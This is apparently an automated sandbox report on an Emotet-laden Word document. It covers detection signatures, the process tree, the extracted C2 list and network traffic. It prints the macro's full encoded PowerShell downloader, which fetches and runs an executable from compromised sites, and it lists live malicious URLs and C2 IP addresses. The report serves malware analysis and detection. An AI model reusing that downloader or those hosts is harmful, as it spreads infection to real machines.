Loading ...

Play interactive tourEdit tour

Analysis Report qNAQ0w2k9I._doc

Overview

General Information

Sample Name:qNAQ0w2k9I._doc (renamed file extension from _doc to doc)
Analysis ID:269486
MD5:4cdf130b0bdfe12d16010353bd65c46e
SHA1:5f7d95434d9ec5e6ac732f7bbe176f22c7ac7daa
SHA256:c8f607b5b5a36af11d0342a5d5957642920b3705c82f630c5a9c9df6396d56d9

Most interesting Screenshot:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious encrypted Powershell command line found
Yara detected Emotet
Yara detected Emotet Downloader
Creates processes via WMI
Document contains an embedded VBA with many string operations indicating source code obfuscation
Drops executables to the windows directory (C:\Windows) and starts them
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
PowerShell case anomaly found
Powershell drops PE file
Very long command line found
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • WINWORD.EXE (PID: 6992 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
  • powershell.exe (PID: 7084 cmdline: powersheLL -e JABNAGMAdABiAGUAbwBtAD0AJwBQAGYAaQBkADAAYwBnACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBDAGAAVQBgAFIASQB0AFkAcABgAFIATwB0AE8AYABjAGAAbwBsACIAIAA9ACAAJwB0AGwAcwAxADIALAAgAHQAbABzADEAMQAsACAAdABsAHMAJwA7ACQAQwA5AGYANABtAHcAYwAgAD0AIAAnAFEAegBzAG8AJwA7ACQAWQBjADUAZQB2AHkAMwA9ACcAUwB6AHoAdABsAG4ANgAnADsAJABTAG8AagBhADIANQBjAD0AJABlAG4AdgA6AHQAZQBtAHAAKwAnAFwAJwArACQAQwA5AGYANABtAHcAYwArACcALgBlAHgAZQAnADsAJABSAGkAaABsAGMAZwBxAD0AJwBQAF8AYgBhADMAcwA1ACcAOwAkAFYAagBhAGsAbgBpAGQAPQAmACgAJwBuAGUAJwArACcAdwAtACcAKwAnAG8AJwArACcAYgBqAGUAYwB0ACcAKQAgAE4ARQB0AC4AVwBFAGIAYwBsAGkAZQBOAHQAOwAkAFkAeQB5ADcANwA3AHMAPQAnAGgAdAB0AHAAOgAvAC8AcwBlAGUAZABzAGEAZwByAG8ALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBNAFoAOQBRAGQALwAqAGgAdAB0AHAAOgAvAC8AYQByAGkAYgBzAGEAbABpAG4ALgBlAG0AYQB0AGoALgBjAG8AbQAvAHUAcAAvAEUAOQBPAGoAMwB0AFAAYQBDAGsALwAqAGgAdAB0AHAAOgAvAC8AZABhAHcAbwBvAGQALQBlAGwAbQBvAHIAYQB0AGUAbAAuAGUAbQBhAHQAagAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AZQBEAE8AUgBZADMAMQA3AC8AKgBoAHQAdABwADoALwAvAGsAaAB1AGQAbwB0AGgAaQBhAHEAdQBhAGMAaQB0AHkALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAEYATABnAGkAVgBNADgALwAqAGgAdAB0AHAAOgAvAC8AZwBwAHoAagB3ADgALgBuAGUAdAAvAGUAawBqAHMAbgAvAEEAVgA3ADgANQAxADMAMQAvACcALgAiAFMAYABQAGwASQBUACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAQQBjADMAcABpAG8AcQA9ACcAUQBuAG4ANwByADEAMwAnADsAZgBvAHIAZQBhAGMAaAAoACQARABvAGQAbAB3AGcAagAgAGkAbgAgACQAWQB5AHkANwA3ADcAcwApAHsAdAByAHkAewAkAFYAagBhAGsAbgBpAGQALgAiAEQAYABPAHcAbgBgAGwAYABPAEEAZABGAEkAbABFACIAKAAkAEQAbwBkAGwAdwBnAGoALAAgACQAUwBvAGoAYQAyADUAYwApADsAJABGAHgAMAAzAHIAawA5AD0AJwBRAGkAdQB3AHgAMwBoACcAOwBJAGYAIAAoACgALgAoACcARwBlACcAKwAnAHQALQAnACsAJwBJAHQAZQBtACcAKQAgACQAUwBvAGoAYQAyADUAYwApAC4AIgBMAGUAYABOAGcAVABIACIAIAAtAGcAZQAgADIANAA1ADAAMwApACAAewAmACgAJwBJAG4AdgBvAGsAZQAtAEkAJwArACcAdAAnACsAJwBlAG0AJwApACgAJABTAG8AagBhADIANQBjACkAOwAkAEIAcwBpAHcAcQBsAGsAPQAnAFQAegB6ADUAdQBmADcAJwA7AGIAcgBlAGEAawA7ACQATAA0AGUAdABjAGYAMwA9ACcAWgAzAGEANQA2ADUANgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABEAGEAcABpAHQAXwA0AD0AJwBSAGEAMQB2AGkAMABkACcA MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 7092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Qzso.exe (PID: 6312 cmdline: 'C:\Users\user\AppData\Local\Temp\Qzso.exe' MD5: CE4BF8D9B6820C85B4E63AF7BDF56442)
      • atl110.exe (PID: 6204 cmdline: C:\Windows\SysWOW64\cfgmgr32\atl110.exe MD5: CE4BF8D9B6820C85B4E63AF7BDF56442)
  • svchost.exe (PID: 6716 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4152 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2812 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1716 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2296 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5664 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["45.173.88.33:80", "209.126.6.222:8080", "5.153.250.14:8080", "190.163.31.26:80", "94.206.45.18:80", "68.183.170.114:8080", "219.92.13.25:80", "111.67.12.221:8080", "207.144.103.227:80", "73.116.193.136:80", "177.72.13.80:80", "70.32.84.74:8080", "77.55.211.77:8080", "172.104.169.32:8080", "51.159.23.217:443", "80.249.176.206:80", "192.241.146.84:8080", "190.115.18.139:8080", "190.190.148.27:8080", "104.131.41.185:8080", "58.171.153.81:80", "191.99.160.58:80", "67.247.242.247:80", "82.76.111.249:443", "212.71.237.140:8080", "177.73.0.98:443", "217.13.106.14:8080", "87.106.46.107:8080", "95.85.151.205:80", "116.125.120.88:443", "186.250.52.226:8080", "81.198.69.61:80", "70.32.115.157:8080", "190.147.137.153:443", "209.236.123.42:8080", "46.28.111.142:7080", "51.255.165.160:8080", "72.47.248.48:7080", "137.74.106.111:7080", "178.250.54.208:8080", "204.225.249.100:7080", "192.241.143.52:8080", "185.94.252.27:443", "24.135.198.218:80", "50.28.51.143:8080", "45.161.242.102:80", "202.4.57.96:80", "212.93.117.170:80", "94.176.234.118:443", "89.32.150.160:8080", "83.169.21.32:7080", "189.2.177.210:443", "91.219.169.180:80", "61.92.159.208:8080", "190.6.193.152:8080", "186.32.90.103:443", "2.47.112.152:80", "24.148.98.177:80", "191.182.6.118:80", "201.171.150.41:443", "5.196.35.138:7080", "177.74.228.34:80", "187.162.248.237:80", "178.79.163.131:8080", "149.62.173.247:8080", "217.199.160.224:7080", "186.103.141.250:443", "170.81.48.2:80", "181.129.96.162:8080", "45.33.77.42:8080", "91.222.77.105:80", "68.183.190.199:8080", "185.94.252.12:80", "114.109.179.60:80", "143.0.87.101:80", "24.135.1.177:80", "188.2.217.94:80", "213.60.96.117:80", "213.176.36.147:8080", "12.162.84.2:8080", "77.90.136.129:8080", "174.100.27.229:80", "82.196.15.205:8080", "104.131.103.37:8080", "85.105.140.135:443", "95.9.180.128:80"], "RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\Documents\20200818\PowerShell_transcript.141700.ywG7p9SO.20200818013427.txtPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0x23:$s1: PowerShell
  • 0xff:$s1: powersheLL
  • 0xdf1:$s1: PowerShell
  • 0x23:$sr1: PowerShell
  • 0xdf1:$sr1: PowerShell
  • 0x23:$sn3: PowerShell
  • 0xdf1:$sn3: PowerShell
  • 0x101:$a1: wersheLL -e
C:\Users\user\Documents\20200818\PowerShell_transcript.141700.ywG7p9SO.20200818013427.txtJoeSecurity_EmotetDownloaderYara detected Emotet DownloaderJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000003.00000002.1292982021.0000000000700000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000004.00000002.1546324793.0000000002440000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000004.00000002.1546398066.0000000002451000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          00000003.00000002.1292993963.0000000000711000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 00000003.00000002.1292982021.0000000000700000.00000040.00000001.sdmpMalware Configuration Extractor: Emotet {"C2 list": ["45.173.88.33:80", "209.126.6.222:8080", "5.153.250.14:8080", "190.163.31.26:80", "94.206.45.18:80", "68.183.170.114:8080", "219.92.13.25:80", "111.67.12.221:8080", "207.144.103.227:80", "73.116.193.136:80", "177.72.13.80:80", "70.32.84.74:8080", "77.55.211.77:8080", "172.104.169.32:8080", "51.159.23.217:443", "80.249.176.206:80", "192.241.146.84:8080", "190.115.18.139:8080", "190.190.148.27:8080", "104.131.41.185:8080", "58.171.153.81:80", "191.99.160.58:80", "67.247.242.247:80", "82.76.111.249:443", "212.71.237.140:8080", "177.73.0.98:443", "217.13.106.14:8080", "87.106.46.107:8080", "95.85.151.205:80", "116.125.120.88:443", "186.250.52.226:8080", "81.198.69.61:80", "70.32.115.157:8080", "190.147.137.153:443", "209.236.123.42:8080", "46.28.111.142:7080", "51.255.165.160:8080", "72.47.248.48:7080", "137.74.106.111:7080", "178.250.54.208:8080", "204.225.249.100:7080", "192.241.143.52:8080", "185.94.252.27:443", "24.135.198.218:80", "50.28.51.143:8080", "45.161.242.102:80", "202.4.57.96:80", "212.93.117.170:80", "94.176.234.118:443", "89.32.150.160:8080", "83.169.21.32:7080", "189.2.177.210:443", "91.219.169.180:80", "61.92.159.208:8080", "190.6.193.152:8080", "186.32.90.103:443", "2.47.112.152:80", "24.148.98.177:80", "191.182.6.118:80", "201.171.150.41:443", "5.196.35.138:7080", "177.74.228.34:80", "187.162.248.237:80", "178.79.163.131:8080", "149.62.173.247:8080", "217.199.160.224:7080", "186.103.141.250:443", "170.81.48.2:80", "181.129.96.162:8080", "45.33.77.42:8080", "91.222.77.105:80", "68.183.190.199:8080", "185.94.252.12:80", "114.109.179.60:80", "143.0.87.101:80", "24.135.1.177:80", "188.2.217.94:80", "213.60.96.117:80", "213.176.36.147:8080", "12.162.84.2:8080", "77.90.136.129:8080", "174.100.27.229:80", "82.196.15.205:8080", "104.131.103.37:8080", "85.105.140.135:443", "95.9.180.128:80"], "RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}
            Source: C:\Windows\SysWOW64\cfgmgr32\atl110.exeCode function: 4_2_02451D6A CryptDecodeObjectEx,4_2_02451D6A
            Source: C:\Users\user\AppData\Local\Temp\Qzso.exeCode function: 3_2_007128C0 FindNextFileW,FindFirstFileW,FindClose,3_2_007128C0
            Source: C:\Windows\SysWOW64\cfgmgr32\atl110.exeCode function: 4_2_024528C0 FindNextFileW,FindFirstFileW,FindClose,4_2_024528C0
            Source: global trafficDNS query: name: seedsagro.com
            Source: global trafficTCP traffic: 192.168.2.5:49742 -> 185.68.16.20:80
            Source: global trafficTCP traffic: 192.168.2.5:49742 -> 185.68.16.20:80
            Source: global trafficHTTP traffic detected: GET /wp-content/MZ9Qd/ HTTP/1.1Host: seedsagro.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /J1csENEJl1pJZVInw/WWY1m4/ HTTP/1.1Referer: http://45.173.88.33/J1csENEJl1pJZVInw/WWY1m4/Content-Type: multipart/form-data; boundary=---------------------------478126150544848User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.173.88.33Content-Length: 4628Connection: Keep-AliveCache-Control: no-cache
            Source: unknownTCP traffic detected without corresponding DNS query: 45.173.88.33
            Source: unknownTCP traffic detected without corresponding DNS query: 45.173.88.33
            Source: unknownTCP traffic detected without corresponding DNS query: 45.173.88.33
            Source: unknownTCP traffic detected without corresponding DNS query: 45.173.88.33
            Source: unknownTCP traffic detected without corresponding DNS query: 45.173.88.33
            Source: unknownTCP traffic detected without corresponding DNS query: 45.173.88.33
            Source: global trafficHTTP traffic detected: GET /wp-content/MZ9Qd/ HTTP/1.1Host: seedsagro.comConnection: Keep-Alive
            Source: unknownDNS traffic detected: queries for: seedsagro.com
            Source: unknownHTTP traffic detected: POST /J1csENEJl1pJZVInw/WWY1m4/ HTTP/1.1Referer: http://45.173.88.33/J1csENEJl1pJZVInw/WWY1m4/Content-Type: multipart/form-data; boundary=---------------------------478126150544848User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.173.88.33Content-Length: 4628Connection: Keep-AliveCache-Control: no-cache
            Source: atl110.exe, 00000004.00000002.1547265404.000000000275C000.00000004.00000001.sdmp, atl110.exe, 00000004.00000002.1547297484.0000000002764000.00000004.00000001.sdmpString found in binary or memory: http://45.173.88.33/J1csENEJl1pJZVInw/WWY1m4/
            Source: atl110.exe, 00000004.00000002.1547297484.0000000002764000.00000004.00000001.sdmpString found in binary or memory: http://45.173.88.33/J1csENEJl1pJZVInw/WWY1m4/.
            Source: atl110.exe, 00000004.00000002.1547297484.0000000002764000.00000004.00000001.sdmpString found in binary or memory: http://45.173.88.33/J1csENEJl1pJZVInw/WWY1m4/Z
            Source: PowerShell_transcript.141700.ywG7p9SO.20200818013427.txt.1.drString found in binary or memory: http://aribsalin.ematj.com/up/E9Oj3tPaCk/
            Source: svchost.exe, 00000012.00000002.1545925673.000001491CDD9000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
            Source: PowerShell_transcript.141700.ywG7p9SO.20200818013427.txt.1.drString found in binary or memory: http://dawood-elmoratel.ematj.com/wp-admin/eDORY317/
            Source: PowerShell_transcript.141700.ywG7p9SO.20200818013427.txt.1.drString found in binary or memory: http://gpzjw8.net/ekjsn/AV785131/
            Source: PowerShell_transcript.141700.ywG7p9SO.20200818013427.txt.1.drString found in binary or memory: http://khudothiaquacity.com/wp-admin/FLgiVM8/
            Source: svchost.exe, 00000012.00000002.1545925673.000001491CDD9000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
            Source: svchost.exe, 00000012.00000002.1545925673.000001491CDD9000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
            Source: PowerShell_transcript.141700.ywG7p9SO.20200818013427.txt.1.drString found in binary or memory: http://seedsagro.com/wp-content/MZ9Qd/
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://api.aadrm.com/
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://api.diagnostics.office.com
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://api.microsoftstream.com/api/
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://api.onedrive.com
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://apis.live.net/v5.0/
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://augloop.office.com
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://cdn.entity.
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://clients.config.office.net/
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://config.edge.skype.com
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://cortana.ai
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://cr.office.com
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://dataservice.o365filtering.com
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://dataservice.o365filtering.com/
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://devnull.onenote.com
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://directory.services.
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://graph.ppe.windows.net
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://graph.ppe.windows.net/
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://graph.windows.net
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://graph.windows.net/
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://incidents.diagnostics.office.com
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://lifecycle.office.com
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://login.microsoftonline.com/
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://login.microsoftonline.com/common
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://login.windows.local
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://management.azure.com
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://management.azure.com/
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://messaging.office.com/
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://ncus-000.contentsync.
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
